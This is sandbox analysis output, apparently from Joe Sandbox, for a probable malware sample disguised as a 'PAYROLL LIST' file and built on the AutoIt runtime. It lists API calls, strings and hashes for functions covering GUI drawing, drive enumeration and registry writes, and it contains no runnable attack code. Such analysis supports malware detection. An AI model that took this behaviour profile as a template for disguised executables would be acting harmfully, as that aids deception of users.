GetSysColorBrush.USER32(0000000F), ref: 00A8D30C
GetSysColor.USER32(0000000F), ref: 00A8D318
SetBkColor.GDI32(?,000000FF), ref: 00A8D332
SelectObject.GDI32(?,00000000), ref: 00A8D341
InflateRect.USER32(?,000000FF,000000FF), ref: 00A8D36C
GetSysColor.USER32(00000010), ref: 00A8D374
CreateSolidBrush.GDI32(00000000), ref: 00A8D37B
FrameRect.USER32(?,?,00000000), ref: 00A8D38A
DeleteObject.GDI32(00000000), ref: 00A8D391
InflateRect.USER32(?,000000FE,000000FE), ref: 00A8D3DC
FillRect.USER32(?,?,00000000), ref: 00A8D40E
GetWindowLongW.USER32(?,000000F0), ref: 00A8D439

Part of subcall function 00A8D575: GetSysColor.USER32(00000012), ref: 00A8D5AE
Part of subcall function 00A8D575: SetTextColor.GDI32(?,?), ref: 00A8D5B2
Part of subcall function 00A8D575: GetSysColorBrush.USER32(0000000F), ref: 00A8D5C8
Part of subcall function 00A8D575: GetSysColor.USER32(0000000F), ref: 00A8D5D3
Part of subcall function 00A8D575: GetSysColor.USER32(00000011), ref: 00A8D5F0
Part of subcall function 00A8D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A8D5FE
Part of subcall function 00A8D575: SelectObject.GDI32(?,00000000), ref: 00A8D60F
Part of subcall function 00A8D575: SetBkColor.GDI32(?,00000000), ref: 00A8D618
Part of subcall function 00A8D575: SelectObject.GDI32(?,?), ref: 00A8D625
Part of subcall function 00A8D575: InflateRect.USER32(?,000000FF,000000FF), ref: 00A8D644
Part of subcall function 00A8D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A8D65B
Part of subcall function 00A8D575: GetWindowLongW.USER32(00000000,000000F0), ref: 00A8D670
Part of subcall function 00A8D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A8D698

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: cea0e3b77f440523115a2d5e77739e7bc52c9758c63d2dada2faf0a78250a0fc
Instruction ID: ae41eb7a750d80f594d5f96f5e91cca15f41b39c8d7266cb82669f6157f087e5
Opcode Fuzzy Hash: cea0e3b77f440523115a2d5e77739e7bc52c9758c63d2dada2faf0a78250a0fc
Instruction Fuzzy Hash: BB917F71408302BFC750EFA4DC48E6BBBA9FF86325F100A19F5A2965E0D771D945CB52

Function 00A6DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A6DBD6
GetDriveTypeW.KERNEL32(?,00ABDC54,?,\\.\,00ABDC00), ref: 00A6DCC3
SetErrorMode.KERNEL32(00000000,00ABDC54,?,\\.\,00ABDC00), ref: 00A6DE29

Strings

ATAPI, xrefs: 00A6DD9A
RAMDisk, xrefs: 00A6DCED
Unknown, xrefs: 00A6DCE3, 00A6DD8C
CDROM, xrefs: 00A6DCF7
SSA, xrefs: 00A6DDAF
Virtual, xrefs: 00A6DDEE
RAID, xrefs: 00A6DDC4
1394, xrefs: 00A6DDA8
PhysicalDrive, xrefs: 00A6DC67
ATA, xrefs: 00A6DDA1
MMC, xrefs: 00A6DDE7
SSD, xrefs: 00A6DD50
SAS, xrefs: 00A6DDD2
Removable, xrefs: 00A6DD15
iSCSI, xrefs: 00A6DDCB
FileBackedVirtual, xrefs: 00A6DDF5
\\.\, xrefs: 00A6DC2B
USB, xrefs: 00A6DDBD
Network, xrefs: 00A6DD01
SATA, xrefs: 00A6DDD9
SCSI, xrefs: 00A6DD93
Fibre, xrefs: 00A6DDB6
Fixed, xrefs: 00A6DD0B

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: bcc298c61e86928cdb4df744b7a4f98b46fa2ae7c501c2f6f31e980f1158874c
Instruction ID: 24893f75dca1ced26aa757ca655fb1ff1256c68fb49a09a210218aa918d7fb3e
Opcode Fuzzy Hash: bcc298c61e86928cdb4df744b7a4f98b46fa2ae7c501c2f6f31e980f1158874c
Instruction Fuzzy Hash: 2B51BE31B48302EBCB00EF24C982E29B7B0FB94B84B204D2BF0539B291DB71D945DB42

Function 00A2CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00A2CC68
__wcsnicmp.LIBCMT ref: 00A2CC80
__wcsnicmp.LIBCMT ref: 00A2CC98
__wcsnicmp.LIBCMT ref: 00A2CCB0
__wcsnicmp.LIBCMT ref: 00A2CCC8
__wcsnicmp.LIBCMT ref: 00A2CCE0
__wcsnicmp.LIBCMT ref: 00A2CCF8
__wcsnicmp.LIBCMT ref: 00A2CD0C
__wcsnicmp.LIBCMT ref: 00A2CD4D
__wcsnicmp.LIBCMT ref: 00A2CD61
__wcsnicmp.LIBCMT ref: 00A2CD75
__wcsnicmp.LIBCMT ref: 00A2CD89

Strings

Cannot parse #include, xrefs: 00A92FA1
#requireadmin, xrefs: 00A2CC92
#pragma compile, xrefs: 00A2CC62
#include, xrefs: 00A2CCDA
#include-once, xrefs: 00A2CCC2
#cs, xrefs: 00A2CD06, 00A2CD5B
#comments-end, xrefs: 00A2CD6F
Unterminated group of comments, xrefs: 00A92FB4
#ce, xrefs: 00A2CD83
#notrayicon, xrefs: 00A2CC7A
#comments-start, xrefs: 00A2CCF2, 00A2CD47
#OnAutoItStartRegister, xrefs: 00A2CCAA
Bad directive syntax error, xrefs: 00A92ECB

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 4fcfe7094de241dfa32940f9cb8fbe09fc80d29f3ee68aa99b37b22571f8b300
Instruction ID: 3bf45322186c634a5f23cfd9d87236d661c99b2238934a9bc0b8827b25e8b888
Opcode Fuzzy Hash: 4fcfe7094de241dfa32940f9cb8fbe09fc80d29f3ee68aa99b37b22571f8b300
Instruction Fuzzy Hash: 2A81F535740225BBCF24AF68ED82FBF3BB8AF64710F044039F905AA182EB61D955C395

Function 00A8C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00A8C788
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00A8C83E
SendMessageW.USER32(?,00001102,00000002,?), ref: 00A8C859
SendMessageW.USER32(?,000000F1,?,00000000), ref: 00A8CB15

Strings

0, xrefs: 00A8C89C

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 47fca62b7ec0062a9ec72dcee5795ecb9dc85dc4053302a2eb8dd57f6d6ebf36
Instruction ID: b6446b015223aeb2c03b1a06d47f8642d26f96be63b1d05ffbedc2b77ddf7b47
Opcode Fuzzy Hash: 47fca62b7ec0062a9ec72dcee5795ecb9dc85dc4053302a2eb8dd57f6d6ebf36
Instruction Fuzzy Hash: D9F1E171204341AFE725EF24C889BAABBE5FF49364F08062DF589D62A1D774C845CFA1

Function 00A8638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00ABDC00), ref: 00A86449

Strings

SETCURRENTSELECTION, xrefs: 00A865D6
TABLEFT, xrefs: 00A864A7
DELSTRING, xrefs: 00A86569
GETCURRENTCOL, xrefs: 00A86724
SENDCOMMANDID, xrefs: 00A867CA
ISVISIBLE, xrefs: 00A86455
ISENABLED, xrefs: 00A8648C
GETLINE, xrefs: 00A8678B
CHECK, xrefs: 00A8668B
ADDSTRING, xrefs: 00A86536
GETLINECOUNT, xrefs: 00A866E4
CURRENTTAB, xrefs: 00A864DD
GETCURRENTLINE, xrefs: 00A86704
ISCHECKED, xrefs: 00A86659
SELECTSTRING, xrefs: 00A86626
SHOWDROPDOWN, xrefs: 00A86500
UNCHECK, xrefs: 00A866A1
GETSELECTED, xrefs: 00A866C1
FINDSTRING, xrefs: 00A86596
TABRIGHT, xrefs: 00A864BD
EDITPASTE, xrefs: 00A8675B
GETCURRENTSELECTION, xrefs: 00A86603
HIDEDROPDOWN, xrefs: 00A86520

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 8cebd943a0b213aec2546f7c54b3c1656b565253f5b9a0089b8ac0e5bb2d42d6
Instruction ID: 7fee61210feb356b0a4f497697f6edbc35567328a5931c75d91a4bdd10bdf4b6
Opcode Fuzzy Hash: 8cebd943a0b213aec2546f7c54b3c1656b565253f5b9a0089b8ac0e5bb2d42d6
Instruction Fuzzy Hash: F2C160302043458BDB04FF14D651AAE77A5BF99354F144869F8866B3E3EB30ED4ACB92

Function 00A8D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00A8D5AE
SetTextColor.GDI32(?,?), ref: 00A8D5B2
GetSysColorBrush.USER32(0000000F), ref: 00A8D5C8
GetSysColor.USER32(0000000F), ref: 00A8D5D3
CreateSolidBrush.GDI32(?), ref: 00A8D5D8
GetSysColor.USER32(00000011), ref: 00A8D5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A8D5FE
SelectObject.GDI32(?,00000000), ref: 00A8D60F
SetBkColor.GDI32(?,00000000), ref: 00A8D618
SelectObject.GDI32(?,?), ref: 00A8D625
InflateRect.USER32(?,000000FF,000000FF), ref: 00A8D644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A8D65B
GetWindowLongW.USER32(00000000,000000F0), ref: 00A8D670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A8D698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A8D6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 00A8D6DD
DrawFocusRect.USER32(?,?), ref: 00A8D6E8
GetSysColor.USER32(00000011), ref: 00A8D6F6
SetTextColor.GDI32(?,00000000), ref: 00A8D6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00A8D712
SelectObject.GDI32(?,00A8D2A5), ref: 00A8D729
DeleteObject.GDI32(?), ref: 00A8D734
SelectObject.GDI32(?,?), ref: 00A8D73A
DeleteObject.GDI32(?), ref: 00A8D73F
SetTextColor.GDI32(?,?), ref: 00A8D745
SetBkColor.GDI32(?,?), ref: 00A8D74F

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 1ab9e391f9024314367997dac17eea245a248069b098c5a3e07b7877a952736b
Instruction ID: da7725bbb5ce4cc118e7ceebb10a1f93e0ea6f93d9ff5e39016a2454e3ac8834
Opcode Fuzzy Hash: 1ab9e391f9024314367997dac17eea245a248069b098c5a3e07b7877a952736b
Instruction Fuzzy Hash: 61513B71900209BFDB10EFA8DC48EAE7B79EB09324F104515F956AB2E1D7759A41CF50

Function 00A8B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A8B7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A8B7C1
CharNextW.USER32(0000014E), ref: 00A8B7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A8B831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A8B847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A8B858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00A8B875
SetWindowTextW.USER32(?,0000014E), ref: 00A8B8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00A8B8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A8B90E
_memset.LIBCMT ref: 00A8B933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00A8B97C
_memset.LIBCMT ref: 00A8B9DB
SendMessageW.USER32 ref: 00A8BA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 00A8BA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 00A8BB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 00A8BB2C
GetMenuItemInfoW.USER32(?), ref: 00A8BB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A8BBA3
DrawMenuBar.USER32(?), ref: 00A8BBB2
SetWindowTextW.USER32(?,0000014E), ref: 00A8BBDA

Strings

0, xrefs: 00A8BB4F

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: d99044d8792b85627dd0a70497f8ec361a252a49df47068d7acd68d0ce25f9a5
Instruction ID: 7d12ff32d2af7e062fab5277d7ef7bc9f605f6a1e73e3edf7aff4bcc5dcbd767
Opcode Fuzzy Hash: d99044d8792b85627dd0a70497f8ec361a252a49df47068d7acd68d0ce25f9a5
Instruction Fuzzy Hash: 73E1AE75910219AFDF20EFA5CC84EEE7BB8FF05710F148156F959AA290DB708A42DF60

Function 00A8764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A8778A
GetDesktopWindow.USER32 ref: 00A8779F
GetWindowRect.USER32(00000000), ref: 00A877A6
GetWindowLongW.USER32(?,000000F0), ref: 00A87808
DestroyWindow.USER32(?), ref: 00A87834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A8785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A8787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00A878A1
SendMessageW.USER32(?,00000421,?,?), ref: 00A878B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00A878C9
IsWindowVisible.USER32(?), ref: 00A878E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00A87904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00A87918
GetWindowRect.USER32(?,?), ref: 00A87930
MonitorFromPoint.USER32(?,?,00000002), ref: 00A87956
GetMonitorInfoW.USER32 ref: 00A87970
CopyRect.USER32(?,?), ref: 00A87987
SendMessageW.USER32(?,00000412,00000000), ref: 00A879F2

Strings

tooltips_class32, xrefs: 00A87856
0, xrefs: 00A87735
(, xrefs: 00A87965

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 7ce6bd659eea2017b020d56535b12259ea0c3279d23522cb63d153df43864a5c
Instruction ID: 72b03703fd7bfaf3d61d1b3b1b445910f577f67f402c7e92fb9d1fd4d4401bf6
Opcode Fuzzy Hash: 7ce6bd659eea2017b020d56535b12259ea0c3279d23522cb63d153df43864a5c
Instruction Fuzzy Hash: 37B1A071608311AFDB44EF68C948B5EBBE5FF88310F10891DF59A9B291DB70E845CB92

Function 00A66CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A66CFB
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A66D21
_wcscpy.LIBCMT ref: 00A66D4F
_wcscmp.LIBCMT ref: 00A66D5A
_wcscat.LIBCMT ref: 00A66D70
_wcsstr.LIBCMT ref: 00A66D7B
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A66D97
_wcscat.LIBCMT ref: 00A66DE0
_wcscat.LIBCMT ref: 00A66DE7
_wcsncpy.LIBCMT ref: 00A66E12

Strings

04090000, xrefs: 00A66DCD
\VarFileInfo\Translation, xrefs: 00A66D8F
%u.%u.%u.%u, xrefs: 00A66E75
DefaultLangCodepage, xrefs: 00A66DFA
StringFileInfo\, xrefs: 00A66D6A

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 9a2864c4324e1df4f3fa17a35cd714b0ea908dfe658c4b4ef1905db7102700f0
Instruction ID: 914b71c020a488b8f884b4f20d55dfce6628d1fdcd5feb477a7237dc98920e18
Opcode Fuzzy Hash: 9a2864c4324e1df4f3fa17a35cd714b0ea908dfe658c4b4ef1905db7102700f0
Instruction Fuzzy Hash: A341D776A00205BFEB00AB74CE47EBF777CEF85714F040469F906A6182EB75DA0196A6

Function 00A3A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A3A939
GetSystemMetrics.USER32(00000007), ref: 00A3A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A3A96C
GetSystemMetrics.USER32(00000008), ref: 00A3A974
GetSystemMetrics.USER32(00000004), ref: 00A3A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A3A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00A3A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A3A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A3AA0D
GetClientRect.USER32(00000000,000000FF), ref: 00A3AA2B
GetStockObject.GDI32(00000011), ref: 00A3AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A3AA52

Part of subcall function 00A3B63C: GetCursorPos.USER32(000000FF), ref: 00A3B64F
Part of subcall function 00A3B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00A3B66C
Part of subcall function 00A3B63C: GetAsyncKeyState.USER32(00000001), ref: 00A3B691
Part of subcall function 00A3B63C: GetAsyncKeyState.USER32(00000002), ref: 00A3B69F

SetTimer.USER32(00000000,00000000,00000028,00A3AB87), ref: 00A3AA79

Strings

AutoIt v3 GUI, xrefs: 00A3A9F1

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: b93d801ab2883ab98c197374423b8848fa529e38858bd4d034bac276d6a26232
Instruction ID: 14cab0142b6b7616f5c19a2b670f201732410713b540c205015f92b3e0f622dd
Opcode Fuzzy Hash: b93d801ab2883ab98c197374423b8848fa529e38858bd4d034bac276d6a26232
Instruction Fuzzy Hash: 17B17C71A0021AAFDB14DFA8DD85BEE7BB4FB18314F114219FA56AB2D0DB34D881CB51

Function 00A22EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00A22F7A
IsWindow.USER32(?), ref: 00A922FD

Strings

REGEXPTITLE, xrefs: 00A920F8
INSTANCE, xrefs: 00A9223C
TITLE, xrefs: 00A92292
ACTIVE, xrefs: 00A920CC
ALL, xrefs: 00A92264
CLASS, xrefs: 00A92128
REGEXPCLASS, xrefs: 00A92149
LAST, xrefs: 00A920B6
HANDLE, xrefs: 00A920E2

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 62970417-1919597938
Opcode ID: de815e389510e1af2fba9bbb5ce2d950ec0bbb47cf5e3a4e1db7df5a846cfcb8
Instruction ID: 773bd343db3171d1ae14d493f9e60365b05f82731c4a9a60c886f6e5de7c7600
Opcode Fuzzy Hash: de815e389510e1af2fba9bbb5ce2d950ec0bbb47cf5e3a4e1db7df5a846cfcb8
Instruction Fuzzy Hash: B8D19430204642BBCF04EF64D681BAABBF4BF54344F104A29F456675A2DB70E99ACBD1

Function 00A83639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A83735
RegCreateKeyExW.ADVAPI32(?,?,00000000,00ABDC00,00000000,?,00000000,?,?), ref: 00A837A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00A837EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00A83874
